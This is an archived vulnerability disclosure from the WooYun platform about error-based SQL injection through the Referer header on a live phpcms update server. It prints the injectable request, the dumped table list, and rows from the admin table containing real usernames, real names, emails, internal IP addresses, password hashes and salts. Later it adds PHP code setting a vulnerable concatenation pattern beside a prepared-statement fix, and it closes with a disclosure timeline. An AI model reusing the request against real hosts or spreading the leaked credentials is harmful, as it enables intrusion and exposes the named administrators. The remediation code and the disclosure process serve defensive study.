MySQL error-based SQL injection on a phpcms site

ID: 121676
URL: http://www.wooyun.org/bug.php?action=view&id=121676
Vulnerability status: confirmed by vendor
Title: MySQL error-based SQL injection on a phpcms site
Type: SQL injection
Vendor: phpcms
White hat: lijiejie
Submitted: 2015-06-19 19:52:00
Published: 2015-08-08 09:22:00
Fixed: (not set)
Confirmed: 2015-06-24 00:00:00
Confirm Spend: 5
Tags:
Followers: 0
Favorites: 0
White-hat rating:
White-hat self-assessed rank: 10
Vendor rating:
Vendor-assigned rank: 5
Summary
MySQL error-based SQL injection on a phpcms site
Details

The Referer header is injectable (the `*` marks the injection point):

GET /index.php HTTP/1.1
Referer: 123*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Cookie: PHPSESSID=qhncam3i8qper9cd21l275k017
Host: update.phpcms.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

POC

current user:    '[email protected]%'
current database: 'phpcms_cn'
Database: phpcms_cn
[200 tables]
+--------------------------+
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_app_log_day |
| v9_app_log_total |
| v9_appcenter |
| v9_appcenter_data |
| v9_apps |
| v9_apps_content |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_buycar |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_check_email |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_relation |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_developer |
| v9_dianping |
| v9_dianping_data |
| v9_dianping_type |
| v9_down |
| v9_down_data |
| v9_downservers |
| v9_edu |
| v9_edu_data |
| v9_en_down |
| v9_en_down_data |
| v9_en_news |
| v9_en_news_data |
| v9_extend_setting |
| v9_favorite |
| v9_finance |
| v9_friend |
| v9_hits |
| v9_info |
| v9_info_data |
| v9_ipbanned |
| v9_kefu_online |
| v9_kefu_process |
| v9_key |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_license |
| v9_license_logs |
| v9_link |
| v9_linkage |
| v9_log |
| v9_loveit |
| v9_loveit_mylove |
| v9_member |
| v9_member_address |
| v9_member_detail |
| v9_member_en |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_miaosha |
| v9_miaosha_data |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_order |
| v9_order_complaint |
| v9_page |
| v9_pai |
| v9_pai_data |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_record |
| v9_pay_spend |
| v9_pl |
| v9_pl_fee |
| v9_plug |
| v9_plug_data |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_201405 |
| v9_poster_201406 |
| v9_poster_201407 |
| v9_poster_201408 |
| v9_poster_201409 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201412 |
| v9_poster_201501 |
| v9_poster_201502 |
| v9_poster_201503 |
| v9_poster_201504 |
| v9_poster_201505 |
| v9_poster_201506 |
| v9_poster_space |
| v9_product |
| v9_product_data |
| v9_queue |
| v9_release_point |
| v9_score_vote |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_sms_address |
| v9_sms_allowsend_ip |
| v9_sms_app |
| v9_sms_blacklist |
| v9_sms_check_queue |
| v9_sms_group |
| v9_sms_md5 |
| v9_sms_news |
| v9_sms_news_data |
| v9_sms_paylist |
| v9_sms_product |
| v9_sms_receive |
| v9_sms_scene |
| v9_sms_send_queue |
| v9_sms_service_queue_gid |
| v9_sms_service_report |
| v9_sms_tk |
| v9_sms_tpl |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_task |
| v9_task_quote |
| v9_task_stage |
| v9_template |
| v9_template_bak |
| v9_template_data |
| v9_times |
| v9_tuan |
| v9_type |
| v9_update_items |
| v9_update_notice |
| v9_update_referer |
| v9_update_site |
| v9_urlrule |
| v9_video_1 |
| v9_video_1_data |
| v9_visitor |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xzzd |
| v9_xzzd_data |
| v9_yp_certificate |
| v9_yp_company |
| v9_yp_design |
| v9_yp_design_data |
| v9_yp_guestbook |
| v9_yp_plug |
| v9_yp_plug_data |
| v9_yp_relation |
| v9_yp_template |
| v9_yp_template_data |
+--------------------------+


Database: phpcms_cn
Table: v9_admin
[3 entries]
+--------+--------+--------------------------------------------------+-----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+
| roleid | userid | card                                             | email                 | encrypt | username     | realname | password                         | lastloginip     | lastlogintime |
+--------+--------+--------------------------------------------------+-----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+
| 1      | 1      | CQUHK1tTJ0NJVSArWxwDWCoBH3ItLCdLNlBQIFtYBwBfVnMC | wangdongw[email protected] | z52Jxg  | phpcms       | <blank>  | 710de87fff574e2123ec793e333c1bad | 114.251.167.194 | 1302248539    |
| 1      | 102    | <blank>                                          | zhangming[email protected] | VBqZUE  | zhangmingxue | 张明雪   | 0664400c18b3fe8a28336493dc291372 | 10.228.132.12   | 1434703129    |
| 1      | 101    | <blank>                                          | [email protected]u6.com | dbtrn6  | mayuhui      | 马玉辉   | 66685d46c2547db24c095798047ef375 | 10.228.132.7    | 1434699380    |
+--------+--------+--------------------------------------------------+-----------------------+---------+--------------+----------+----------------------------------+-----------------+---------------+

Fix recommendation

Filter and validate the parameter before it reaches the database (the Referer header is attacker-controlled input like any other request field).
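The fix is easier to see in code. The following is an added illustration written for this report; it is not phpcms's own code, and the table `referer_log`, its columns, the DSN and the credentials are hypothetical placeholders. It puts the pattern that produces a bug like the one above (a request header concatenated into SQL text, with the MySQL error echoed back) beside the hardened form that the "filter the parameter" advice amounts to in practice: validate the value, pass it as a bound parameter, and keep database error text out of the response.

```php
<?php
// Added example, not phpcms's code. Table, columns, DSN and credentials are placeholders.

// VULNERABLE PATTERN: the Referer header goes straight into the SQL string.
// A single quote in the header closes the literal and the rest of the header
// becomes SQL; printing $e->getMessage() is what makes the bug error-based,
// because MySQL's error text carries the result of whatever was injected.
function log_referer_vulnerable(PDO $db, string $ip): void
{
    $referer = $_SERVER['HTTP_REFERER'] ?? '';
    $sql = "INSERT INTO referer_log (referer, ip) VALUES ('$referer', '$ip')";
    try {
        $db->exec($sql);
    } catch (PDOException $e) {
        echo 'DB error: ' . $e->getMessage(); // leaks the MySQL error to the client
    }
}

// HARDENED PATTERN, step 1: validate the header before it is stored at all.
// Returns null for anything that is not a plausible http(s) URL.
function normalize_referer(?string $raw): ?string
{
    if ($raw === null || $raw === '') {
        return null;
    }
    $raw = substr($raw, 0, 255);               // bound the length to the column size
    $parts = parse_url($raw);
    if ($parts === false
        || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                           // junk such as "123*" never reaches SQL
    }
    return $raw;
}

// HARDENED PATTERN, step 2: the value travels as a bound parameter, so the
// server never parses it as SQL, and errors are logged rather than echoed.
function log_referer_safe(PDO $db, string $ip): void
{
    $referer = normalize_referer($_SERVER['HTTP_REFERER'] ?? null);
    $stmt = $db->prepare(
        'INSERT INTO referer_log (referer, ip, created_at) VALUES (:ref, :ip, NOW())'
    );
    $stmt->bindValue(':ref', $referer, $referer === null ? PDO::PARAM_NULL : PDO::PARAM_STR);
    $stmt->bindValue(':ip', $ip, PDO::PARAM_STR);
    try {
        $stmt->execute();
    } catch (PDOException $e) {
        // Keep the detail server-side; the client only ever sees a generic failure.
        error_log('referer log failed: ' . $e->getMessage());
    }
}

// Placeholder connection. ATTR_EMULATE_PREPARES=false makes PDO use real
// server-side prepared statements instead of client-side string escaping.
$db = new PDO('mysql:host=127.0.0.1;dbname=phpcms_cn;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
log_referer_safe($db, $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0');
```

Two points are worth separating when applying this to a real code base: the prepared statement is what removes the injection, while the validation in `normalize_referer` and the switch from `echo` to `error_log` reduce what an attacker learns if some other query is still built by concatenation. Turning off `display_errors` in production gives the same protection for every code path at once.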

Status history
2015-06-19: Details sent to the vendor; awaiting vendor response
2015-06-24: Vendor confirmed; details disclosed to the vendor only
2015-07-04: Details disclosed to core white hats and domain experts
2015-07-14: Details disclosed to regular white hats
2015-07-24: Details disclosed to trainee white hats
2015-08-08: Details disclosed to the public
Vendor reply: Thanks
Response details: Severity: Medium; Vulnerability Rank: 5; Confirmed: 2015-06-24 09:21
Comments (content | commenter | likes | time)

Hello, our business team would like to get in touch with you. Email: [email protected]

Cnb-Web | 0 | 2015-06-21 23:28:00